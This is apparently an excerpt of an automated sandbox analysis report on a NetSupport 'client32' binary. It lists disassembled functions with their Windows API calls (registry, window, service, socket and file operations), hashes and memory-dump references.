                                                                                                                                                                                                    • API String ID: 137821192-1725438197
                                                                                                                                                                                                    • Opcode ID: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
                                                                                                                                                                                                    • Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Enum$Open$CloseValue
                                                                                                                                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                                    • API String ID: 2823542970-1528906934
                                                                                                                                                                                                    • Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                                                                                    • Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Enum$Open$CloseValue
                                                                                                                                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                                    • API String ID: 2823542970-1528906934
                                                                                                                                                                                                    • Opcode ID: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
                                                                                                                                                                                                    • Instruction ID: cd76c2840a1715f7d7d399ef9620e7e6cb5bc654635ea96c8559331baeb526dc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF417175B4022DABEB21CA11CC81FEEB77CEB54708F1041D9F659A6140DBB06A85CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Enum$Open$CloseValue
                                                                                                                                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                                    • API String ID: 2823542970-1528906934
                                                                                                                                                                                                    • Opcode ID: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
                                                                                                                                                                                                    • Instruction ID: 375c621035b705b1b9e3f4a5420693f98d17ac4dbe140293a3c4dc63feaf086a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F74181B5B4022DABEB21CA118C81FEEB77CEB54708F1041D5F658A6140DBB06E81CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                                                                                      • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                                                                                      • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000021), ref: 111312C9
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 111312D1
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 111312D7
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 111312E3
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 111312FA
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000001,NSMWClass,027E0500,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion
                                                                                                                                                                                                    • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                                                                                    • API String ID: 1322952435-1114959992
                                                                                                                                                                                                    • Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                                                                                    • Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,BBC4A55B), ref: 1102CA84
                                                                                                                                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
                                                                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 1102CAC6
                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102CB22
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102CB4F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                                                                                    • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                                                                                    • API String ID: 83693535-2077998243
                                                                                                                                                                                                    • Opcode ID: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
                                                                                                                                                                                                    • Instruction ID: feb44ee288a455167e99161b47e0bacd9894a59b82cfe6c7d6bea4f2cf3f1955
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86B1B675E012299FDB22CFA4CD84BE9B7F5EB48708F5041E9E919A7380E7709A80CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ioctlsocket.WSOCK32 ref: 689B7642
                                                                                                                                                                                                    • connect.WSOCK32(00000000,?,?), ref: 689B7659
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,?), ref: 689B7660
                                                                                                                                                                                                    • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 689B76F3
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689B7717
                                                                                                                                                                                                    • ioctlsocket.WSOCK32 ref: 689B775C
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689B7762
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 689B777A
                                                                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 689B778B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$ioctlsocket$CountTickconnectselect
                                                                                                                                                                                                    • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                                                                                                    • API String ID: 4076736948-2969206566
                                                                                                                                                                                                    • Opcode ID: 82e0a33be5e4bef42b17d716e678e04ace4da3e04084b9d1fe6aea649fda9186
                                                                                                                                                                                                    • Instruction ID: 87f9f4dd9c0a01c72500b6abf5fce001a59235a158a499ef375aa6c631893e23
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82e0a33be5e4bef42b17d716e678e04ace4da3e04084b9d1fe6aea649fda9186
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F241EA75900314AFE7209B64CC88BEFB3BAAF55308F804199E50997141EB74DB85CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1112FCF0
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1112FD21
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1112FD3C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$FolderPathwsprintf
                                                                                                                                                                                                    • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                                                                                                    • API String ID: 1170620360-4157686185
                                                                                                                                                                                                    • Opcode ID: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                                                                                                    • Instruction ID: f8032102c9863659257b5da4bc21e17edc1143fb98c82bb39be53882a9ddc186
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5731597AE0132A6BEA109FE59C80FFEF7789F5030DF200075ED55EA244EA31A5448B92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,?,?,0000000C,00000001,00000080,00000000,00000000,00000109,00000109), ref: 1117591E
                                                                                                                                                                                                    • CreateFileA.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 11175957
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1117597B
                                                                                                                                                                                                    • GetFileType.KERNEL32(110B7069), ref: 1117599A
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 111759BF
                                                                                                                                                                                                    • CloseHandle.KERNEL32(110B7069), ref: 111759D1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(110B7069), ref: 11175D87
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,?,?,0000000C,00000003,00000001,00000000), ref: 11175DA7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 11175DB1
                                                                                                                                                                                                    Strings
